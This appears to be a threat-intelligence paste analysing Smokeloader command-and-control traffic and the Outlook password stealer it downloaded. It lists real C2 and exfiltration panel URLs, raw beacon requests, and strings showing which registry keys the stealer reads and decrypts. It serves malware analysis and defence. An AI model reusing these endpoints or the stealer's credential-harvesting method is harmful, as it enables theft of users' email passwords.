API tools faq
paste
PepperPotts

smokeloader, downloading outlook stealer (2017-12-07)

PepperPotts
Mar 25th, 2018
227
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.15 KB | None | 0 0
raw download clone embed print report
  1. #SMOKELOADER
  2.  
  3. 35103341abb740021017ce2757b186051920993aebe22ce413654eb7abe076de (First Submission 2017-12-07 09:22:53)
  4.  
  5. *Readable text of communications with CnC:
  6.  
  7. -POSTs to http://104.168.140.87/blog/
  8.  
  9. -Answers "HTTP 404 Not Found" with content
  10.  
  11. -Second response is a PE file (some interesting strings from the PE file: OutlookPasswordRecovery, decryptOutlookPassword, ...)
  12.  
  13. -Third response with some additional urls:
  14. -PANEL: http://inseltech.com.mx/t1/lala.php
  15. -OPENDIR: http://inseltech.com.mx/t1/
  16. counter.txt -> stolen data
  17. host.php
  18. lala.php
  19. out.exe
  20.  
  21. ---------------------------------------------------------------------------------------------------------
  22. ---------------------------------------------------------------------------------------------------------
  23. ---------------------------------------------------------------------------------------------------------
  24. ---------------------------------------------------------------------------------------------------------
  25.  
  26. * tcp localhost:52606 ---> 104.168.140.87:80
  27.  
  28. ---------------------------------------------------------------------------------------------------------
  29. POST /blog/ HTTP/1.1[...]Cache-Control: no-cache[...]Connection: Keep-Alive[...]Pragma: no-cache[...]Content-Type: application/x-www-form-urlencoded[...]Host: pokpok.bit[...]User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)[...]Content-Length: 63[...]hIZz[...])
  30.  
  31. ---------------------------------------------------------------------------------------------------------
  32. POST /blog/ HTTP/1.1[...]Cache-Control: no-cache[...]Connection: Keep-Alive[...]Pragma: no-cache[...]Content-Type: application/x-www-form-urlencoded[...]Host: pokpok.bit[...]User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)[...]Content-Length: 63[...]hIZz[...])
  33.  
  34. ---------------------------------------------------------------------------------------------------------
  35. POST /blog/ HTTP/1.1[...]Cache-Control: no-cache[...]Connection: Keep-Alive[...]Pragma: no-cache[...]Content-Type: application/x-www-form-urlencoded[...]Host: pokpok.bit[...]User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)[...]Content-Length: 63[...]hIZz
  36.  
  37.  
  38. ---------------------------------------------------------------------------------------------------------
  39. ---------------------------------------------------------------------------------------------------------
  40. ---------------------------------------------------------------------------------------------------------
  41. ---------------------------------------------------------------------------------------------------------
  42.  
  43. * tcp 104.168.140.87:80 ---> localhost:52606
  44.  
  45. ---------------------------------------------------------------------------------------------------------
  46. HTTP/1.1 404 Not Found[...]Server: nginx/1.12.2[...]Date: Fri, 23 Mar 2018 03:11:57 GMT[...]Content-Type: text/html; charset=windows-1251[...]Transfer-Encoding: chunked[...]Connection: keep-alive[...]X-Powered-By: PHP/5.5.38[...]1f4f[...]6e7V[...]W T|
  47.  
  48. ---------------------------------------------------------------------------------------------------------
  49. HTTP/1.1 404 Not Found[...]Server: nginx/1.12.2[...]Date: Fri, 23 Mar 2018 03:12:22 GMT[...]Content-Type: text/html; charset=windows-1251[...]Transfer-Encoding: chunked[...]Connection: keep-alive[...]X-Powered-By: PHP/5.5.38[...]1f4f[...]!This program cannot be run in DOS mode.[...].text[...]`.sdata[...].rsrc[...]@.reloc[...]lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet[...]PADPADP[...]$%(#[...]"%(#[...]*Vs-[...]BSJB[...]v2.0.50727[...]#Strings[...]#GUID[...]#Blob[...]U\t8[...]c\t8[...]<Module>[...]mscorlib[...]Microsoft.VisualBasic[...]MyApplication[...]OutlookPasswordRecovery.My[...]MyComputer[...]MyProject[...]MyForms[...]MyWebServices[...]ThreadSafeObjectProvider`1[...]Module1[...]OutlookPasswordRecovery[...]RecoveredApplicationAccount[...]Resources[...]OutlookPasswordRecovery.My.Resources[...]MySettings[...]MySettingsProperty[...]Microsoft.VisualBasic.ApplicationServices[...]ConsoleApplicationBase[...].ctor[...]Microsoft.VisualBasic.Devices[...]Computer[...]System[...]Object[...].cctor[...]get_Computer[...]m_ComputerObjectProvider[...]get_Application[...]m_AppObjectProvider[...]User[...]get_User[...]m_UserObjectProvider[...]get_Forms[...]m_MyFormsObjectProvider[...]get_WebServices[...]m_MyWebServi[...]1000[...]cesObjectProvider[...]Application[...]Forms[...]WebServices[...]Create__Instance__[...]System.Windows.Forms[...]Form[...]Instance[...]Dispose__Instance__[...]instance[...]System.Collections[...]Hashtable[...]m_FormBeingCreated[...]Equals[...]GetHashCode[...]Type[...]GetType[...]ToString[...]get_GetInstance[...]m_ThreadStaticValue[...]GetInstance[...]System.Net[...]HttpWebRequest[...]request[...]HttpWebResponse[...]response[...]System.IO[...]StreamReader[...]reader[...]address[...]appId[...]context[...]query[...]System.Text[...]StringBuilder[...]data[...]byteData[...]Stream[...]postStream[...]Main[...]SendInfo[...]strSend[...]System.Collections.Generic[...]List`1[...]GetOutlookPasswords[...]decryptOutlookPassword[...]encryptedData[...]_appName[...]_username[...]_password[...]_URL[...]_Port[...]get_UserName[...]set_UserName[...]Value[...]get_Password[...]set_Password[...]get_URL[...]set_URL[...]get_appName[...]set_appName[...]get_Port[...]set_Port[...]UserName[...]Password[...]appName[...]Port[...]System.Resources[...]ResourceManager[...]resourceMan[...]System.Globalization[...]CultureInfo[...]resourceCulture[...]get_ResourceManager[...]get_Culture[...]set_Culture[...]Culture[...]System.Configuration[...]ApplicationSettingsBase[...]defaultInstance[...]get_Default[...]Default[...]get_Settings[...]Settings[...]Enumerator[...]get_Count[...]GetEnumerator[...]get_Current[...]String[...]Concat[...]MoveNext[...]IDisposable[...]Dispose[...]Strings[...]CompareMethod[...]InStr[...]Microsoft.VisualBasic.CompilerServices[...]ProjectData[...]EndApp[...]UTF8Encoding[...]System.Web[...]HttpUtility[...]UrlEncode[...]Encoding[...]GetBytes[...]WebRequest[...]Create[...]set_Method[...]set_KeepAlive[...]set_ContentType[...]set_Referer[...]set_UserAgent[...]set_ContentLength[...]GetRequestStream[...]Write[...]Close[...]WebResponse[...]GetResponse[...]GetResponseStream[...]ReadToEnd[...]Console[...]WriteLine[...]Microsoft.Win32[...]RegistryKey[...]Exception[...]Registry[...]CurrentUser[...]OpenSubKey[...]GetSubKeyNames[...]GetValue[...]System.Runtime.CompilerServices[...]RuntimeHelpers[...]GetObjectValue[...]Boolean[...]NewLateBinding[...]LateGet[...]SetProjectError[...]ClearProjectError[...]GetString[...]Replace[...]Convert[...]ToChar[...]Conversions[...]Byte[...]Buffer[...]Array[...]BlockCopy[...]get_UTF8[...]System.Security[...]System.Security.Cryptography[...]ProtectedData[...]DataProtectionScope[...]Unprotect[...]StandardModuleAttribute[...]STAThreadAttribute[...]System.ComponentModel[...]EditorBrowsableAttribute[...]EditorBrowsableState[...]System.CodeDom.Compiler[...]GeneratedCodeAttribute[...]System.Diagnostics[...]DebuggerHiddenAttribute[...]HideModuleNameAttribute[...]System.ComponentModel.Design[...]HelpKeywordAttribute[...]System.Reflection[...]TargetInvocationException[...]Control[...]get_IsDisposed[...]RuntimeTypeHandle[...]GetTypeFromHandle[...]ContainsKey[...]Utils[...]GetResourceString[...]InvalidOperationException[...]Activator[...]CreateInstance[...]get_InnerException[...]get_Message[...]Remove[...]Component[...]MyGroupCollectionAttribute[...]ThreadStaticAttribute[...]System.Runtime.InteropServices[...]ComVisibleAttribute[...]CompilerGeneratedAttribute[...]ReferenceEquals[...]Assembly[...]get_Assembly[...]DebuggerNonUserCodeAttribute[...]SettingsBase[...]Synchronized[...]OutlookPasswordRecovery.Resources.resources[...]DebuggableAttribute[...]DebuggingModes[...]CompilationRelaxationsAttribute[...]RuntimeCompatibilityAttribute[...]AssemblyFileVersionAttribute[...]GuidAttribute[...]AssemblyTrademarkAttribute[...]AssemblyCopyrightAttribute[...]AssemblyProductAttribute[...]AssemblyCompanyAttribute[...]AssemblyDescriptionAttribute[...]AssemblyTitleAttribute[...]OutlookPasswordRecovery.exe[...]AssemblyTitleAttribute[...]OutlookPasswordRecovery.exe[...]2000[...]MyTemplate[...]8.0.0.0[...]My.WebServices[...]My.Forms[...]My.Computer[...]My.User[...]My.Application[...]System.Windows.Forms.Form[...]Create__Instance__[...]Dispose__Instance__[...]My.MyProject.Forms[...]4System.Web.Services.Protocols.SoapHttpClientProtocol[...]Create__Instance__[...]Dispose__Instance__[...]3System.Resources.Tools.StronglyTypedResourceBuilder[...]4.0.0.0[...]KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator[...]12.0.0.0[...]My.Settings[...]WrapNonExceptionThrows[...]1.0.0.0[...]$5959a1e5-8c73-4b31-a9f8-1005a929b798[...]Copyright[...]2016[...]ConsoleApplication1[...]_CorExeMain[...]mscoree.dll[...]RSDS~[...]C:\\Users\\W7\\Downloads\\OutlookPasswordRecovery-master\\OutlookPasswordRecovery-master\\OutlookPasswordRecovery\\obj\\Release\\OutlookPasswordRecovery.pdb[...]wwwwwwwwwwwwww[...]wwwwwwwwwwwwww[...]wwwwwwwwwwwwww[...]wwwwwwwwwwwwww[...]wwwwwwwwwwwwww[...]wwwwwwwwwwwwww[...]wwwwwwwwwwwwww[...]wwwwwwwwwwwwww[...]wwwwww[...]wwwwww[...]wwwwww[...]wwwwww[...]1000[...]IHDR[...]pHYs[...]IDATx[...]IEND[...]10b5[...]<?xml version="1.0" encoding="UTF-8" standalone="yes"?>[...]<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">[...]<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>[...]<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">[...]<security>[...]<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">[...]<requestedExecutionLevel level="asInvoker" uiAccess="false"/>[...]</requestedPrivileges>[...]</security>[...]</trustInfo>[...]</assembly>[...]
  50.  
  51. ---------------------------------------------------------------------------------------------------------
  52. HTTP/1.1 404 Not Found[...]Server: nginx/1.12.2[...]Date: Fri, 23 Mar 2018 03:12:24 GMT[...]Content-Type: text/html; charset=windows-1251[...]Transfer-Encoding: chunked[...]Connection: keep-alive[...]X-Powered-By: PHP/5.5.38[...]<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">[...]<html><head>[...]<title>404 Not Found</title>[...]</head><body>[...]<h1>Not Found</h1>[...]<p>The requested URL /blog/ was not found on this server.</p>[...]<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>[...]<hr></body></html>[...]HTTP/1.1 404 Not Found[...]Server: nginx/1.12.2[...]Date: Fri, 23 Mar 2018 03:12:24 GMT[...]Content-Type: text/html; charset=windows-1251[...]Transfer-Encoding: chunked[...]Connection: keep-alive[...]X-Powered-By: PHP/5.5.38[...]<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">[...]<html><head>[...]<title>404 Not Found</title>[...]</head><body>[...]<h1>Not Found</h1>[...]<p>The requested URL /blog/ was not found on this server.</p>[...]<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>[...]<hr></body></html>[...]uuuu[...]hey=[...]http://inseltech.com.mx/t1/lala.php[...]POST[...]application/x-www-form-urlencoded[...]http://ggl.com[...]Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)[...]IMAP Password[...]POP3 Password[...]HTTP Password[...]SMTP Password[...]Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676[...]Softwar[...]hey=[...]http://inseltech.com.mx/t1/lala.php[...]POST[...]application/x-www-form-urlencoded[...]http://ggl.com[...]Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)[...]IMAP Password[...]POP3 Password[...]HTTP Password[...]SMTP Password[...]Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676[...]Softwar[...]e\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676[...]Email[...]GetBytes[...]SMTP Server[...]Nothing[...]SMTP Port[...]Outlook[...]WinForms_RecursiveFormCreate[...]WinForms_SeeInnerException[...]OutlookPasswordRecovery.Resources[...]VS_VERSION_INFO[...]VarFileInfo[...]Translation[...]StringFileInfo[...]000004b0[...]FileDescription[...]ConsoleApplication1[...]FileVersion[...]1.0.0.0[...]InternalName[...]OutlookPasswordRecovery.exe[...]LegalCopyright[...]Copyright[...]2016[...]OriginalFilename[...]OutlookPasswordRecovery.exe[...]ProductName[...]ConsoleApplication1[...]ProductVersion[...]1.0.0.0[...]Assembly Version[...]1.0.0.0
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!